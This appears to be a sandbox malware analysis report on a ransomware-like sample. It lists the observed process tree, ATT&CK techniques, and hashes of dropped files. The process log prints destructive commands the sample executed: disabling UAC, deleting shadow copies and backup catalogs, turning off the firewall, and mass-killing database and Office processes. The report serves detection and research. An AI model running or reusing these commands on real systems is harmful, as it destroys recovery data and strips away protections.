C:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
2⤵
PID:2196

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
3⤵
- Modifies registry key
PID:2384

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2400

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set currentprofile state off
3⤵
PID:2624

C:\Windows\SysWOW64\netsh.exe
netsh firewall set opmode mode=disable
3⤵
PID:5044

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
3⤵
PID:1960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
2⤵
PID:2108

C:\Windows\SysWOW64\taskkill.exe
taskkill /im msftesql.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3968

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqlagent.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3900

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqlbrowser.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4280

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqlservr.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3000

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqlwriter.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4872

C:\Windows\SysWOW64\taskkill.exe
taskkill /im oracle.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4208

C:\Windows\SysWOW64\taskkill.exe
taskkill /im ocssd.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2092

C:\Windows\SysWOW64\taskkill.exe
taskkill /im dbsnmp.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2008

C:\Windows\SysWOW64\taskkill.exe
taskkill /im synctime.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4080

C:\Windows\SysWOW64\taskkill.exe
taskkill /im agntsvc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4084

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mydesktopqos.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2164

C:\Windows\SysWOW64\taskkill.exe
taskkill /im isqlplussvc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4516

C:\Windows\SysWOW64\taskkill.exe
taskkill /im xfssvccon.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4524

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mydesktopservice.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2144

C:\Windows\SysWOW64\taskkill.exe
taskkill /im ocautoupds.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3812

C:\Windows\SysWOW64\taskkill.exe
taskkill /im agntsvc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2472

C:\Windows\SysWOW64\taskkill.exe
taskkill /im encsvc.exe
3⤵
- Kills process with taskkill
PID:4360

C:\Windows\SysWOW64\taskkill.exe
taskkill /im firefoxconfig.exe
3⤵
- Kills process with taskkill
PID:2408

C:\Windows\SysWOW64\taskkill.exe
taskkill /im tbirdconfig.exe
3⤵
- Kills process with taskkill
PID:4956

C:\Windows\SysWOW64\taskkill.exe
taskkill /im ocomm.exe
3⤵
- Kills process with taskkill
PID:1004

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mysqld.exe
3⤵
- Kills process with taskkill
PID:4660

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mysqld-nt.exe
3⤵
- Kills process with taskkill
PID:4900

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mysqld-opt.exe
3⤵
- Kills process with taskkill
PID:4536

C:\Windows\SysWOW64\taskkill.exe
taskkill /im dbeng50.exe
3⤵
- Kills process with taskkill
PID:4076

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqbcoreservice.exe
3⤵
- Kills process with taskkill
PID:3852

C:\Windows\SysWOW64\taskkill.exe
taskkill /im excel.exe
3⤵
- Kills process with taskkill
PID:4312

C:\Windows\SysWOW64\taskkill.exe
taskkill /im infopath.exe
3⤵
- Kills process with taskkill
PID:536

C:\Windows\SysWOW64\taskkill.exe
taskkill /im msaccess.exe
3⤵
- Kills process with taskkill
PID:2240

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mspub.exe
3⤵
- Kills process with taskkill
PID:2684

C:\Windows\SysWOW64\taskkill.exe
taskkill /im onenote.exe
3⤵
- Kills process with taskkill
PID:624

C:\Windows\SysWOW64\taskkill.exe
taskkill /im outlook.exe
3⤵
- Kills process with taskkill
PID:2764

C:\Windows\SysWOW64\taskkill.exe
taskkill /im powerpnt.exe
3⤵
- Kills process with taskkill
PID:3128

C:\Windows\SysWOW64\taskkill.exe
taskkill /im steam.exe
3⤵
- Kills process with taskkill
PID:3120

C:\Windows\SysWOW64\taskkill.exe
taskkill /im thebat.exe
3⤵
- Kills process with taskkill
PID:1924

C:\Windows\SysWOW64\taskkill.exe
taskkill /im thebat64.exe
3⤵
- Kills process with taskkill
PID:4520

C:\Windows\SysWOW64\taskkill.exe
taskkill /im thunderbird.exe
3⤵
- Kills process with taskkill
PID:4932

C:\Windows\SysWOW64\taskkill.exe
taskkill /im visio.exe
3⤵
- Kills process with taskkill
PID:2708

C:\Windows\SysWOW64\taskkill.exe
taskkill /im winword.exe
3⤵
- Kills process with taskkill
PID:2604

C:\Windows\SysWOW64\taskkill.exe
taskkill /im wordpad.exe
3⤵
- Kills process with taskkill
PID:2992

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2036

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Scheduled Task

1

T1053

Privilege Escalation

Bypass User Account Control

1

T1088

Scheduled Task

1

T1053

Defense Evasion

Bypass User Account Control

1

T1088

Disabling Security Tools

1

T1089

Modify Registry

2

T1112

File Deletion

1

T1107

Credential Access

Credentials in Files

1

T1081

Discovery

Query Registry

2

T1012

System Information Discovery

4

T1082

Peripheral Device Discovery

1

T1120

Process Discovery

1

T1057

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

1

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msoshext.dll
Filesize
1.7MB

MD5
c606bd7c9c733dd27f74157c34e51742

SHA1
aab92689723449fbc3e123fb614dd536a74b74d4

SHA256
606390649012b31b5d83630f1186562e4b1ce4023d8870d8c29eb62e7e0769e0

SHA512
5f8fabe3d9753413d1aedcc76b9568c50dd25a5a6aeacd1ce88aecc28c0ba96dac80177679d380708213a0997946e49383bdaca7114c8c9526a24ed999194e38

Download Submit
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msvcp140.dll
Filesize
613KB

MD5
c1b066f9e3e2f3a6785161a8c7e0346a

SHA1
8b3b943e79c40bc81fdac1e038a276d034bbe812

SHA256
99e3e25cda404283fbd96b25b7683a8d213e7954674adefa2279123a8d0701fd

SHA512
36f9e6c86afbd80375295238b67e4f472eb86fcb84a590d8dba928d4e7a502d4f903971827fdc331353e5b3d06616664450759432fdc8d304a56e7dacb84b728

Download Submit
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\vcruntime140.dll
Filesize
83KB

MD5
1453290db80241683288f33e6dd5e80e

SHA1
29fb9af50458df43ef40bfc8f0f516d0c0a106fd

SHA256
2b7602cc1521101d116995e3e2ddfe0943349806378a0d40add81ba64e359b6c

SHA512
4ea48a11e29ea7ac3957dcab1a7912f83fd1c922c43d7b7d78523178fe236b4418729455b78ac672bb5632ecd5400746179802c6a9690adb025270b0ade84e91

Download Submit
C:\Users\Admin\AppData\h4_svc.bat
Filesize
2KB

MD5
64d589b71fbf0cdc2c9bdb2ec62d5598

SHA1
dafa76bf4125d2621c06914b5ea7f63355867e31

SHA256
be014b2ea649d22a59ea48725ac8dbb38b47aaca52559ca188d73daa96e8df89

SHA512
b8f1e49a0fb8c50b6c7d3864cc42c9c470f519425cc02c6f3353d97177378f9b02b18322af01a39c0cde8e4ddabe4611821a38b04bc7f5025eb4cab4c64ef07e

Download Submit
C:\Users\Admin\AppData\t2_svc.bat
Filesize
138B

MD5
702f5dc6f9dec28c8c9b7b6885c9fe09

SHA1
dbb85da6de899deb21ce0a8f25c1726cd19e49e8

SHA256
20bf5224af318c449407c99e5f4628f71b874463a1cb777031a43b6236ab97e9

SHA512
fa4bfc3ac77561585d03bf62e7bb4de0602cf442b5c54b70945f8c75114d111559f50ad36026e2bb1027323f7f50130b7c60bee22835400a8a07feab436ccff7

Download Submit
C:\Users\Admin\AppData\v9_svc.vbs
Filesize
686B

MD5
e9c50acda9063b2462697bdbd0a0dfe2

SHA1
d1a2bc54905ce0e9121f8e5c249e0527f2190b7e

SHA256
f236c75a867944ce27e123b3aaf3a465084bc6135dc453f7f4aacb1cbf9946bd

SHA512
d5cd841b82867e323f5cd28f97c9a27ea32be1b3793cb7ddff1ccc3c0559c6b3758f6366d259eda2265431f67a1eebe41dcfb2047ee94c515eb458af6311b8a9

Download Submit
memory/536-192-0x0000000000000000-mapping.dmp

Download
memory/624-195-0x0000000000000000-mapping.dmp

Download
memory/852-155-0x0000000000000000-mapping.dmp

Download
memory/1004-185-0x0000000000000000-mapping.dmp

Download
memory/1476-143-0x0000000000000000-mapping.dmp

Download
memory/1536-153-0x0000000000000000-mapping.dmp

Download
memory/1832-154-0x0000000000000000-mapping.dmp

Download
memory/1960-161-0x0000000000000000-mapping.dmp

Download
memory/2008-173-0x0000000000000000-mapping.dmp

Download
memory/2040-137-0x0000000000000000-mapping.dmp

Download
memory/2092-172-0x0000000000000000-mapping.dmp

Download
memory/2108-162-0x0000000000000000-mapping.dmp

Download
memory/2144-179-0x0000000000000000-mapping.dmp

Download
memory/2152-138-0x0000000000000000-mapping.dmp

Download
memory/2164-176-0x0000000000000000-mapping.dmp

Download
memory/2196-156-0x0000000000000000-mapping.dmp

Download
memory/2228-139-0x0000000000000000-mapping.dmp

Download
memory/2232-144-0x0000000000000000-mapping.dmp

Download
memory/2240-193-0x0000000000000000-mapping.dmp

Download
memory/2376-142-0x0000000000000000-mapping.dmp

Download
memory/2384-157-0x0000000000000000-mapping.dmp

Download
memory/2400-158-0x0000000000000000-mapping.dmp

Download
memory/2408-183-0x0000000000000000-mapping.dmp

Download
memory/2472-181-0x0000000000000000-mapping.dmp

Download
memory/2624-159-0x0000000000000000-mapping.dmp

Download
memory/2684-194-0x0000000000000000-mapping.dmp

Download
memory/2764-196-0x0000000000000000-mapping.dmp

Download
memory/2876-132-0x0000000000000000-mapping.dmp

Download
memory/3000-169-0x0000000000000000-mapping.dmp

Download
memory/3348-149-0x0000000000000000-mapping.dmp

Download
memory/3428-131-0x0000000000000000-mapping.dmp

Download
memory/3500-165-0x0000000000000000-mapping.dmp

Download
memory/3812-180-0x0000000000000000-mapping.dmp

Download
memory/3852-190-0x0000000000000000-mapping.dmp

Download
memory/3856-140-0x0000000000000000-mapping.dmp

Download
memory/3900-164-0x0000000000000000-mapping.dmp

Download
memory/3940-145-0x0000000000000000-mapping.dmp

Download
memory/3968-163-0x0000000000000000-mapping.dmp

Download
memory/4012-130-0x0000000000000000-mapping.dmp

Download
memory/4076-189-0x0000000000000000-mapping.dmp

Download
memory/4080-174-0x0000000000000000-mapping.dmp

Download
memory/4084-175-0x0000000000000000-mapping.dmp

Download
memory/4200-166-0x0000000000000000-mapping.dmp

Download
memory/4204-168-0x0000000000000000-mapping.dmp

Download
memory/4208-171-0x0000000000000000-mapping.dmp

Download
memory/4240-133-0x0000000000000000-mapping.dmp

Download
memory/4272-151-0x0000000000000000-mapping.dmp

Download
memory/4280-167-0x0000000000000000-mapping.dmp

Download
memory/4296-134-0x0000000000000000-mapping.dmp

Download
memory/4312-191-0x0000000000000000-mapping.dmp

Download
memory/4360-182-0x0000000000000000-mapping.dmp

Download
memory/4444-148-0x0000000000000000-mapping.dmp

Download
memory/4516-177-0x0000000000000000-mapping.dmp

Download
memory/4524-147-0x0000000000000000-mapping.dmp

Download
memory/4524-178-0x0000000000000000-mapping.dmp

Download
memory/4532-146-0x0000000000000000-mapping.dmp

Download
memory/4536-188-0x0000000000000000-mapping.dmp

Download
memory/4660-186-0x0000000000000000-mapping.dmp

Download
memory/4872-170-0x0000000000000000-mapping.dmp

Download
memory/4900-187-0x0000000000000000-mapping.dmp

Download
memory/4956-184-0x0000000000000000-mapping.dmp

Download
memory/4984-150-0x0000000000000000-mapping.dmp

Download
memory/5044-160-0x0000000000000000-mapping.dmp

Download
memory/5080-152-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads